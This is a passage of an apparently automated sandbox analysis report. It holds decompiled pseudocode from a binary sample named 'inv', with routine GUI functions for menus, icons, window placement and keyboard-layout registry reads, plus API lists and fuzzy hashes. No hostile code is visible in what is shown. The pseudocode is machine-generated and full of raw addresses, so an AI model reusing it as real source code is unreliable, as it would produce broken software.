                                  				struct tagMENUITEMINFOA _v61;
                                  				char _v68;
                                  				intOrPtr _t103;
                                  				CHAR* _t109;
                                  				char _t115;
                                  				short _t149;
                                  				void* _t154;
                                  				intOrPtr _t161;
                                  				intOrPtr _t184;
                                  				struct HMENU__* _t186;
                                  				int _t190;
                                  				void* _t192;
                                  				intOrPtr _t193;
                                  				void* _t196;
                                  				void* _t205;
                                  
                                  				_t155 = __ecx;
                                  				_v68 = 0;
                                  				_v12 = 0;
                                  				_v5 = __ecx;
                                  				_t186 = __edx;
                                  				_t154 = __eax;
                                  				_push(_t196);
                                  				_push(0x43b8df);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t196 + 0xffffffc0;
                                  				if( *((char*)(__eax + 0x3e)) == 0) {
                                  					L22:
                                  					_pop(_t161);
                                  					 *[fs:eax] = _t161;
                                  					_push(0x43b8e6);
                                  					E00403E10( &_v68);
                                  					return E00403E10( &_v12);
                                  				}
                                  				E00403EA8( &_v12,  *((intOrPtr*)(__eax + 0x30)));
                                  				if(E0043D600(_t154) <= 0) {
                                  					__eflags =  *((short*)(_t154 + 0x60));
                                  					if( *((short*)(_t154 + 0x60)) == 0) {
                                  						L8:
                                  						if((GetVersion() & 0x000000ff) < 4) {
                                  							_t190 =  *(0x44dba4 + ((E0040421C( *((intOrPtr*)(_t154 + 0x30)), 0x43b904) & 0xffffff00 | __eflags == 0x00000000) & 0x0000007f) * 4) |  *0x0044DB98 |  *0x0044DB88 |  *0x0044DB90 | 0x00000400;
                                  							_t103 = E0043D600(_t154);
                                  							__eflags = _t103;
                                  							if(_t103 <= 0) {
                                  								InsertMenuA(_t186, 0xffffffff, _t190,  *(_t154 + 0x50) & 0x0000ffff, E004042D0(_v12));
                                  							} else {
                                  								_t109 = E004042D0( *((intOrPtr*)(_t154 + 0x30)));
                                  								InsertMenuA(_t186, 0xffffffff, _t190 | 0x00000010, E0043BB94(_t154), _t109);
                                  							}
                                  							goto L22;
                                  						}
                                  						_v61.cbSize = 0x2c;
                                  						_v61.fMask = 0x3f;
                                  						_t192 = E0043DBBC(_t154);
                                  						if(_t192 == 0 ||  *((char*)(_t192 + 0x40)) == 0 && E0043D1D8(_t154) == 0) {
                                  							if( *((intOrPtr*)(_t154 + 0x4c)) == 0) {
                                  								L14:
                                  								_t115 = 0;
                                  								goto L16;
                                  							}
                                  							_t205 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x4c)))) + 0x1c))();
                                  							if(_t205 == 0) {
                                  								goto L15;
                                  							}
                                  							goto L14;
                                  						} else {
                                  							L15:
                                  							_t115 = 1;
                                  							L16:
                                  							_v13 = _t115;
                                  							_v61.fType =  *(0x44dbd8 + ((E0040421C( *((intOrPtr*)(_t154 + 0x30)), 0x43b904) & 0xffffff00 | _t205 == 0x00000000) & 0x0000007f) * 4) |  *0x0044DBD0 |  *0x0044DBAC |  *0x0044DBE0 |  *0x0044DBE8;
                                  							_v61.fState =  *0x0044DBB8 |  *0x0044DBC8 |  *0x0044DBC0;
                                  							_v61.wID =  *(_t154 + 0x50) & 0x0000ffff;
                                  							_v61.hSubMenu = 0;
                                  							_v61.hbmpChecked = 0;
                                  							_v61.hbmpUnchecked = 0;
                                  							_v61.dwTypeData = E004042D0(_v12);
                                  							if(E0043D600(_t154) > 0) {
                                  								_v61.hSubMenu = E0043BB94(_t154);
                                  							}
                                  							InsertMenuItemA(_t186, 0xffffffff, 0xffffffff,  &_v61);
                                  							goto L22;
                                  						}
                                  					}
                                  					_t193 =  *((intOrPtr*)(_t154 + 0x64));
                                  					__eflags = _t193;
                                  					if(_t193 == 0) {
                                  						L7:
                                  						_push(_v12);
                                  						_push(0x43b8f8);
                                  						E0043ACE8( *((intOrPtr*)(_t154 + 0x60)), _t154, _t155,  &_v68, _t193);
                                  						_push(_v68);
                                  						E00404190();
                                  						goto L8;
                                  					}
                                  					__eflags =  *((intOrPtr*)(_t193 + 0x64));
                                  					if( *((intOrPtr*)(_t193 + 0x64)) != 0) {
                                  						goto L7;
                                  					}
                                  					_t184 =  *0x43a578; // 0x43a5c4
                                  					_t149 = E00403264( *((intOrPtr*)(_t193 + 4)), _t184);
                                  					__eflags = _t149;
                                  					if(_t149 != 0) {
                                  						goto L8;
                                  					}
                                  					goto L7;
                                  				}
                                  				_v61.hSubMenu = E0043BB94(_t154);
                                  				goto L8;
                                  			}

                                  APIs
                                  • InsertMenuItemA.USER32(?,000000FF,000000FF,0000002C), ref: 0043B830
                                  • GetVersion.KERNEL32(00000000,0043B8DF), ref: 0043B720
                                    • Part of subcall function 0043BB94: CreatePopupMenu.USER32(?,0043B89B,00000000,00000000,0043B8DF), ref: 0043BBAF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Menu$CreateInsertItemPopupVersion
                                  • String ID: ,$?
                                  • API String ID: 133695497-2308483597
                                  • Opcode ID: 5de382ec41d6dd96af3b06a8017175958c72e97cb015a3a7c48b0a28992b20ae
                                  • Instruction ID: 0c5e4b8f2f76d59b067ec3093218ee92218ec90c360ef988cb41f5e5968a588f
                                  • Opcode Fuzzy Hash: 5de382ec41d6dd96af3b06a8017175958c72e97cb015a3a7c48b0a28992b20ae
                                  • Instruction Fuzzy Hash: 0B61B234A042449BDB10EF79D8816AA7BF9FF4D304F05647AEA40E73A6D738E845C798
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 86%
                                  			E0041DC74() {
                                  				struct HINSTANCE__* _t145;
                                  				long _t166;
                                  				intOrPtr _t167;
                                  				intOrPtr _t186;
                                  				void* _t192;
                                  				BYTE* _t193;
                                  				BYTE* _t196;
                                  				intOrPtr _t197;
                                  				void* _t198;
                                  				intOrPtr _t199;
                                  
                                  				 *((intOrPtr*)(_t198 - 0x24)) = 0;
                                  				 *((intOrPtr*)(_t198 - 0x20)) = E0041DAE8( *( *((intOrPtr*)(_t198 - 0x10)) + 2) & 0x0000ffff);
                                  				_t192 =  *((intOrPtr*)(_t198 - 0xc)) - 1;
                                  				if(_t192 > 0) {
                                  					_t197 = 1;
                                  					do {
                                  						_t167 = E0041DAE8( *( *((intOrPtr*)(_t198 - 0x10)) + 2 + (_t197 + _t197) * 8) & 0x0000ffff);
                                  						if(_t167 <=  *((intOrPtr*)(_t198 - 0x1c)) && _t167 >=  *((intOrPtr*)(_t198 - 0x20)) && E0041DAF4( *((intOrPtr*)(_t198 - 0x10)) + ( *((intOrPtr*)(_t198 - 0x24)) +  *((intOrPtr*)(_t198 - 0x24))) * 8,  *((intOrPtr*)(_t198 - 0x10)) + (_t197 + _t197) * 8, _t198) != 0) {
                                  							 *((intOrPtr*)(_t198 - 0x24)) = _t197;
                                  							 *((intOrPtr*)(_t198 - 0x20)) = _t167;
                                  						}
                                  						_t197 = _t197 + 1;
                                  						_t192 = _t192 - 1;
                                  						_t204 = _t192;
                                  					} while (_t192 != 0);
                                  				}
                                  				 *(_t198 - 0x40) =  *((intOrPtr*)(_t198 - 0x10)) + ( *((intOrPtr*)(_t198 - 0x24)) +  *((intOrPtr*)(_t198 - 0x24))) * 8;
                                  				 *( *(_t198 + 8)) =  *( *(_t198 - 0x40)) & 0x000000ff;
                                  				( *(_t198 + 8))[1] = ( *(_t198 - 0x40))[1] & 0x000000ff;
                                  				 *((intOrPtr*)(_t198 - 0x2c)) = E004077D4(( *(_t198 - 0x40))[8], _t204);
                                  				 *[fs:eax] = _t199;
                                  				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t198 - 4)))) + 0x14))( *[fs:eax], 0x41de5b, _t198);
                                  				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t198 - 4)))) + 0xc))();
                                  				E0041D92C( *((intOrPtr*)(_t198 - 0x2c)),  *((intOrPtr*)(_t198 - 0x2c)), _t198 - 0x38, _t198 - 0x34, _t192,  *((intOrPtr*)( *((intOrPtr*)(_t198 - 4)))), _t204,  *(_t198 + 8));
                                  				GetObjectA( *(_t198 - 0x38), 0x18, _t198 - 0x70);
                                  				GetObjectA( *(_t198 - 0x34), 0x18, _t198 - 0x58);
                                  				_t166 =  *(_t198 - 0x64) *  *(_t198 - 0x68) * ( *(_t198 - 0x60) & 0x0000ffff);
                                  				 *(_t198 - 0x3c) =  *(_t198 - 0x4c) *  *(_t198 - 0x50) * ( *(_t198 - 0x48) & 0x0000ffff);
                                  				 *((intOrPtr*)(_t198 - 0x18)) =  *(_t198 - 0x3c) + _t166;
                                  				 *(_t198 - 0x30) = E004077D4( *((intOrPtr*)(_t198 - 0x18)), _t204);
                                  				_push(_t198);
                                  				_push(0x41de38);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t199;
                                  				_t193 =  *(_t198 - 0x30);
                                  				_t196 =  &(( *(_t198 - 0x30))[_t166]);
                                  				GetBitmapBits( *(_t198 - 0x38), _t166, _t193);
                                  				GetBitmapBits( *(_t198 - 0x34),  *(_t198 - 0x3c), _t196);
                                  				DeleteObject( *(_t198 - 0x34));
                                  				DeleteObject( *(_t198 - 0x38));
                                  				_t145 =  *0x44f664; // 0x400000
                                  				 *((intOrPtr*)( *((intOrPtr*)(_t198 - 8)))) = CreateIcon(_t145,  *( *(_t198 + 8)), ( *(_t198 + 8))[1],  *(_t198 - 0x48),  *(_t198 - 0x46), _t193, _t196);
                                  				if( *((intOrPtr*)( *((intOrPtr*)(_t198 - 8)))) == 0) {
                                  					E0041D09C(_t166);
                                  				}
                                  				_pop(_t186);
                                  				 *[fs:eax] = _t186;
                                  				_push(E0041DE3F);
                                  				return E004026DC( *(_t198 - 0x30));
                                  			}

                                  APIs
                                  • GetObjectA.GDI32(?,00000018,?), ref: 0041DD66
                                  • GetObjectA.GDI32(?,00000018,?), ref: 0041DD75
                                  • GetBitmapBits.GDI32(?,?,?), ref: 0041DDC6
                                  • GetBitmapBits.GDI32(?,?,?), ref: 0041DDD4
                                  • DeleteObject.GDI32(?), ref: 0041DDDD
                                  • DeleteObject.GDI32(?), ref: 0041DDE6
                                  • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041DE08
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Object$BitmapBitsDelete$CreateIcon
                                  • String ID:
                                  • API String ID: 1030595962-0
                                  • Opcode ID: a493f37630d313a8ab3b666c3e5046268f9920936161065bfb53cc2c53949fa9
                                  • Instruction ID: 30875b8bfea210891da0a6cec79c71750fcf32235eb8013acc0712630be66db0
                                  • Opcode Fuzzy Hash: a493f37630d313a8ab3b666c3e5046268f9920936161065bfb53cc2c53949fa9
                                  • Instruction Fuzzy Hash: FA61E775E002199FCB40DFA9C881ADEBBF9FF49304B114466F805EB351D639AD91CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 68%
                                  			E00433938(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                  				intOrPtr* _v8;
                                  				void _v12;
                                  				intOrPtr _v16;
                                  				int _v24;
                                  				int _v28;
                                  				intOrPtr _v32;
                                  				char _v36;
                                  				intOrPtr* _t80;
                                  				intOrPtr _t91;
                                  				void* _t119;
                                  				intOrPtr _t136;
                                  				intOrPtr _t145;
                                  				void* _t148;
                                  
                                  				asm("movsd");
                                  				asm("movsd");
                                  				asm("movsd");
                                  				asm("movsd");
                                  				_t119 = __ecx;
                                  				_v8 = __eax;
                                  				_t145 =  *0x44e0ec; // 0x44fbb4
                                  				 *((char*)(_v8 + 0x210)) = 1;
                                  				_push(_t148);
                                  				_push(0x433b11);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t148 + 0xffffffe0;
                                  				E0042BF10(_v8, __ecx, __ecx, _t145);
                                  				_v16 = _v16 + 4;
                                  				E0042D100(_v8,  &_v28);
                                  				if(E00448D7C() <  *(_v8 + 0x4c) + _v24) {
                                  					_v24 = E00448D7C() -  *(_v8 + 0x4c);
                                  				}
                                  				if(E00448D88() <  *(_v8 + 0x48) + _v28) {
                                  					_v28 = E00448D88() -  *(_v8 + 0x48);
                                  				}
                                  				if(E00448D70() > _v28) {
                                  					_v28 = E00448D70();
                                  				}
                                  				if(E00448D64() > _v16) {
                                  					_v16 = E00448D64();
                                  				}
                                  				SetWindowPos(E004325A4(_v8), 0xffffffff, _v28, _v24,  *(_v8 + 0x48),  *(_v8 + 0x4c), 0x10);
                                  				if(GetTickCount() -  *((intOrPtr*)(_v8 + 0x214)) > 0xfa && E004040D0(_t119) < 0x64 &&  *0x44d9d0 != 0) {
                                  					SystemParametersInfoA(0x1016, 0,  &_v12, 0);
                                  					if(_v12 != 0) {
                                  						SystemParametersInfoA(0x1018, 0,  &_v12, 0);
                                  						if(_v12 == 0) {
                                  							E00436B8C( &_v36);
                                  							if(_v32 <= _v24) {
                                  							}
                                  						}
                                  						 *0x44d9d0(E004325A4(_v8), 0x64,  *0x0044DAD8 | 0x00040000);
                                  					}
                                  				}
                                  				_t80 =  *0x44dfb8; // 0x44fbb0
                                  				E0042FCD8(_v8,  *((intOrPtr*)( *_t80 + 0x30)));
                                  				ShowWindow(E004325A4(_v8), 4);
                                  				 *((intOrPtr*)( *_v8 + 0x7c))();
                                  				_pop(_t136);
                                  				 *[fs:eax] = _t136;
                                  				_push(0x433b18);
                                  				 *((intOrPtr*)(_v8 + 0x214)) = GetTickCount();
                                  				_t91 = _v8;
                                  				 *((char*)(_t91 + 0x210)) = 0;
                                  				return _t91;
                                  			}

                                  APIs
                                  • SetWindowPos.USER32(00000000,000000FF,?,?,?,?,00000010,00000000,00433B11), ref: 00433A1D
                                  • GetTickCount.KERNEL32 ref: 00433A22
                                  • SystemParametersInfoA.USER32(00001016,00000000,?,00000000), ref: 00433A5D
                                  • SystemParametersInfoA.USER32(00001018,00000000,00000000,00000000), ref: 00433A75
                                  • AnimateWindow.USER32(00000000,00000064,00000001), ref: 00433ABB
                                  • ShowWindow.USER32(00000000,00000004,00000000,000000FF,?,?,?,?,00000010,00000000,00433B11), ref: 00433ADE
                                    • Part of subcall function 00436B8C: GetCursorPos.USER32(?), ref: 00436B90
                                  • GetTickCount.KERNEL32 ref: 00433AF8
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Window$CountInfoParametersSystemTick$AnimateCursorShow
                                  • String ID:
                                  • API String ID: 3024527889-0
                                  • Opcode ID: d63b6c8084175378d01836d4ecc6302de1c46b1a314d260133b736f3e127af26
                                  • Instruction ID: 3024290327c9533f4d2744711a43057b7d38c4f586b52be3a07f9c054e8ef0e4
                                  • Opcode Fuzzy Hash: d63b6c8084175378d01836d4ecc6302de1c46b1a314d260133b736f3e127af26
                                  • Instruction Fuzzy Hash: 3D516D74A00109EFDB10EFA9C986A9EB3F5EF48305F20456AF540E7395C779AE40CB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 92%
                                  			E00429864(intOrPtr __eax, void* __ecx, intOrPtr _a4) {
                                  				char _v5;
                                  				char _v12;
                                  				intOrPtr _v16;
                                  				intOrPtr _v20;
                                  				struct HWND__* _v24;
                                  				intOrPtr _v28;
                                  				char _v32;
                                  				struct tagRECT _v48;
                                  				struct tagRECT _v64;
                                  				struct HWND__* _t53;
                                  				intOrPtr _t55;
                                  				intOrPtr _t60;
                                  				intOrPtr _t65;
                                  				intOrPtr _t78;
                                  				intOrPtr _t84;
                                  				intOrPtr _t86;
                                  				intOrPtr _t93;
                                  				intOrPtr _t98;
                                  				intOrPtr _t101;
                                  				void* _t102;
                                  				intOrPtr* _t104;
                                  				intOrPtr _t106;
                                  				intOrPtr _t110;
                                  				intOrPtr _t112;
                                  				struct HWND__* _t113;
                                  				intOrPtr _t114;
                                  				intOrPtr _t116;
                                  				intOrPtr _t117;
                                  
                                  				_t102 = __ecx;
                                  				_t101 = __eax;
                                  				_v5 = 1;
                                  				_t113 = E00429CB4(_a4 + 0xfffffff7);
                                  				_v24 = _t113;
                                  				_t53 = GetWindow(_t113, 4);
                                  				_t104 =  *0x44dfb8; // 0x44fbb0
                                  				if(_t53 ==  *((intOrPtr*)( *_t104 + 0x30))) {
                                  					L6:
                                  					if(_v24 == 0) {
                                  						L25:
                                  						return _v5;
                                  					}
                                  					_t114 = _t101;
                                  					while(1) {
                                  						_t55 =  *((intOrPtr*)(_t114 + 0x30));
                                  						if(_t55 == 0) {
                                  							break;
                                  						}
                                  						_t114 = _t55;
                                  					}
                                  					_t112 = E004325A4(_t114);
                                  					_v28 = _t112;
                                  					if(_t112 == _v24) {
                                  						goto L25;
                                  					}
                                  					_t13 = _a4 - 0x10; // 0xe87d83e8
                                  					_t60 =  *((intOrPtr*)( *_t13 + 0x30));
                                  					if(_t60 == 0) {
                                  						_t19 = _a4 - 0x10; // 0xe87d83e8
                                  						_t106 =  *0x42840c; // 0x428458
                                  						__eflags = E00403264( *_t19, _t106);
                                  						if(__eflags == 0) {
                                  							__eflags = 0;
                                  							_v32 = 0;
                                  						} else {
                                  							_t21 = _a4 - 0x10; // 0xe87d83e8
                                  							_v32 = E004325A4( *_t21);
                                  						}
                                  						L19:
                                  						_v12 = 0;
                                  						_t65 = _a4;
                                  						_v20 =  *((intOrPtr*)(_t65 - 9));
                                  						_v16 =  *((intOrPtr*)(_t65 - 5));
                                  						_push( &_v32);
                                  						_push(E004297F8);
                                  						_push(GetCurrentThreadId());
                                  						L00406258();
                                  						_t126 = _v12;
                                  						if(_v12 == 0) {
                                  							goto L25;
                                  						}
                                  						GetWindowRect(_v24,  &_v48);
                                  						_push(_a4 + 0xfffffff7);
                                  						_push(_a4 - 1);
                                  						E004032D4(_t101, _t126);
                                  						_t78 =  *0x44fb30; // 0x0
                                  						_t110 =  *0x4271ec; // 0x427238
                                  						if(E00403264(_t78, _t110) == 0) {
                                  							L23:
                                  							if(IntersectRect( &_v48,  &_v48,  &_v64) != 0) {
                                  								_v5 = 0;
                                  							}
                                  							goto L25;
                                  						}
                                  						_t84 =  *0x44fb30; // 0x0
                                  						if( *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x38)) + 0xa0)) == 0) {
                                  							goto L23;
                                  						}
                                  						_t86 =  *0x44fb30; // 0x0
                                  						if(E004325A4( *((intOrPtr*)( *((intOrPtr*)(_t86 + 0x38)) + 0xa0))) == _v24) {
                                  							goto L25;
                                  						}
                                  						goto L23;
                                  					}
                                  					_t116 = _t60;
                                  					while(1) {
                                  						_t93 =  *((intOrPtr*)(_t116 + 0x30));
                                  						if(_t93 == 0) {
                                  							break;
                                  						}
                                  						_t116 = _t93;
                                  					}
                                  					_v32 = E004325A4(_t116);
                                  					goto L19;
                                  				}
                                  				_t117 = E00428DD0(_v24, _t102);
                                  				if(_t117 == 0) {
                                  					goto L25;
                                  				} else {
                                  					while(1) {
                                  						_t98 =  *((intOrPtr*)(_t117 + 0x30));
                                  						if(_t98 == 0) {
                                  							break;
                                  						}
                                  						_t117 = _t98;
                                  					}
                                  					_v24 = E004325A4(_t117);
                                  					goto L6;
                                  				}
                                  			}

                                  APIs
                                    • Part of subcall function 00429CB4: WindowFromPoint.USER32(00429A8E,0044FB54,00000000,0042987E,?,-0000000C,?), ref: 00429CBA
                                    • Part of subcall function 00429CB4: GetParent.USER32(00000000), ref: 00429CD1
                                  • GetWindow.USER32(00000000,00000004), ref: 00429886
                                  • GetCurrentThreadId.KERNEL32 ref: 0042995A
                                  • 72E7AC10.USER32(00000000,004297F8,?,00000000,00000004,?,-0000000C,?), ref: 00429960
                                  • GetWindowRect.USER32 ref: 00429977
                                  • IntersectRect.USER32 ref: 004299E5
                                    • Part of subcall function 00428DD0: GetWindowThreadProcessId.USER32(00000000), ref: 00428DDD
                                    • Part of subcall function 00428DD0: GetCurrentProcessId.KERNEL32(?,?,00000000,0044AEBB,?,?,0044C944,00000001,0044B027,?,?,?,0044C944), ref: 00428DE6
                                    • Part of subcall function 00428DD0: GlobalFindAtomA.KERNEL32 ref: 00428DFB
                                    • Part of subcall function 00428DD0: GetPropA.USER32 ref: 00428E12
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Window$CurrentProcessRectThread$AtomFindFromGlobalIntersectParentPointProp
                                  • String ID: 8rB
                                  • API String ID: 2049660638-1357010674
                                  • Opcode ID: 3f896aa0e0bf821ae00e2481b9b2c1111ace0677af82a28a8c090e5af3ffad72
                                  • Instruction ID: 3b0ca3b7202829636575bd769126f3a1fc6de3f7958843d9d8925eb635a21888
                                  • Opcode Fuzzy Hash: 3f896aa0e0bf821ae00e2481b9b2c1111ace0677af82a28a8c090e5af3ffad72
                                  • Instruction Fuzzy Hash: 03519371B012149FCB10EFA9D481B9EB7E4BF09354F54416AE844EB351D738EE41CB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 76%
                                  			E00448FC8(intOrPtr __eax, void* __ebx, void* __fp0) {
                                  				intOrPtr _v8;
                                  				int _v12;
                                  				void* _v16;
                                  				char _v20;
                                  				void* _v24;
                                  				struct HKL__* _v280;
                                  				char _v536;
                                  				char _v600;
                                  				char _v604;
                                  				char _v608;
                                  				char _v612;
                                  				void* _t60;
                                  				intOrPtr _t106;
                                  				intOrPtr _t111;
                                  				void* _t117;
                                  				void* _t118;
                                  				intOrPtr _t119;
                                  				void* _t129;
                                  
                                  				_t129 = __fp0;
                                  				_t117 = _t118;
                                  				_t119 = _t118 + 0xfffffda0;
                                  				_v612 = 0;
                                  				_v8 = __eax;
                                  				_push(_t117);
                                  				_push(0x449173);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t119;
                                  				if( *((intOrPtr*)(_v8 + 0x34)) != 0) {
                                  					L11:
                                  					_pop(_t106);
                                  					 *[fs:eax] = _t106;
                                  					_push(0x44917a);
                                  					return E00403E10( &_v612);
                                  				} else {
                                  					 *((intOrPtr*)(_v8 + 0x34)) = E004030A8(1);
                                  					E00403E10(_v8 + 0x38);
                                  					_t60 = GetKeyboardLayoutList(0x40,  &_v280) - 1;
                                  					if(_t60 < 0) {
                                  						L10:
                                  						 *((char*)( *((intOrPtr*)(_v8 + 0x34)) + 0x1d)) = 0;
                                  						E004150B4( *((intOrPtr*)(_v8 + 0x34)), 1);
                                  						goto L11;
                                  					} else {
                                  						_v20 = _t60 + 1;
                                  						_v24 =  &_v280;
                                  						do {
                                  							if(E00436FFC( *_v24) == 0) {
                                  								goto L9;
                                  							} else {
                                  								_v608 =  *_v24;
                                  								_v604 = 0;
                                  								if(RegOpenKeyExA(0x80000002, E00408770( &_v600,  &_v608, "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x", _t129, 0), 0, 0x20019,  &_v16) != 0) {
                                  									goto L9;
                                  								} else {
                                  									_push(_t117);
                                  									_push(0x44912f);
                                  									_push( *[fs:eax]);
                                  									 *[fs:eax] = _t119;
                                  									_v12 = 0x100;
                                  									if(RegQueryValueExA(_v16, "layout text", 0, 0,  &_v536,  &_v12) == 0) {
                                  										E00404080( &_v612, 0x100,  &_v536);
                                  										 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x34)))) + 0x3c))();
                                  										if( *_v24 ==  *((intOrPtr*)(_v8 + 0x3c))) {
                                  											E00404080(_v8 + 0x38, 0x100,  &_v536);
                                  										}
                                  									}
                                  									_pop(_t111);
                                  									 *[fs:eax] = _t111;
                                  									_push(0x449136);
                                  									return RegCloseKey(_v16);
                                  								}
                                  							}
                                  							goto L12;
                                  							L9:
                                  							_v24 = _v24 + 4;
                                  							_t38 =  &_v20;
                                  							 *_t38 = _v20 - 1;
                                  						} while ( *_t38 != 0);
                                  						goto L10;
                                  					}
                                  				}
                                  				L12:
                                  			}

                                  APIs
                                  • GetKeyboardLayoutList.USER32(00000040,?,00000000,00449173,?,02191320,?,004491D5,00000000,?,0042E3DF), ref: 0044901E
                                  • RegOpenKeyExA.ADVAPI32(80000002,00000000), ref: 00449086
                                  • RegQueryValueExA.ADVAPI32(?,layout text,00000000,00000000,?,00000100,00000000,0044912F,?,80000002,00000000), ref: 004490C0
                                  • RegCloseKey.ADVAPI32(?,00449136,00000000,?,00000100,00000000,0044912F,?,80000002,00000000), ref: 00449129
                                  Strings
                                  • layout text, xrefs: 004490B7
                                  • System\CurrentControlSet\Control\Keyboard Layouts\%.8x, xrefs: 00449070
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: CloseKeyboardLayoutListOpenQueryValue
                                  • String ID: System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text
                                  • API String ID: 1703357764-2652665750
                                  • Opcode ID: 12775d2584473edc3e086760544049d5cfd815eb7e8b5b21e4d1740e175ea691
                                  • Instruction ID: 4309b47ac8640d6fc7b7e1fbda4dd74930839395904a5e9ccf664e757c01b06c
                                  • Opcode Fuzzy Hash: 12775d2584473edc3e086760544049d5cfd815eb7e8b5b21e4d1740e175ea691
                                  • Instruction Fuzzy Hash: 09416874A0060AAFEB10DF55C986B9EB7F8EF48304F5040A6E904E7391D738AE44DB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 56%
                                  			E00439AE8(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
                                  				intOrPtr _v8;
                                  				void* __ecx;
                                  				intOrPtr _t9;
                                  				void* _t11;
                                  				intOrPtr _t17;
                                  				void* _t28;
                                  				intOrPtr _t33;
                                  				intOrPtr _t34;
                                  				intOrPtr _t37;
                                  				struct HINSTANCE__* _t41;
                                  				void* _t43;
                                  				intOrPtr _t45;
                                  				intOrPtr _t46;
                                  
                                  				_t45 = _t46;
                                  				_push(__ebx);
                                  				_t43 = __edx;
                                  				_t28 = __eax;
                                  				if( *0x44fb98 == 0) {
                                  					 *0x44fb98 = E0040B8C0("comctl32.dll", __eax);
                                  					if( *0x44fb98 >= 0x60000) {
                                  						_t41 = GetModuleHandleA("comctl32.dll");
                                  						if(_t41 != 0) {
                                  							 *0x44fb9c = GetProcAddress(_t41, "ImageList_WriteEx");
                                  						}
                                  					}
                                  				}
                                  				_v8 = E004199BC(_t43, 1, 0);
                                  				_push(_t45);
                                  				_push(0x439be2);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t46;
                                  				if( *0x44fb9c == 0) {
                                  					_t9 = _v8;
                                  					if(_t9 != 0) {
                                  						_t9 = _t9 - 0xffffffec;
                                  					}
                                  					_push(_t9);
                                  					_t11 = E00438A30(_t28);
                                  					_push(_t11);
                                  					L00421AE8();
                                  					if(_t11 == 0) {
                                  						_t33 =  *0x44dea0; // 0x41a280
                                  						E0040B12C(_t33, 1);
                                  						E0040384C();
                                  					}
                                  				} else {
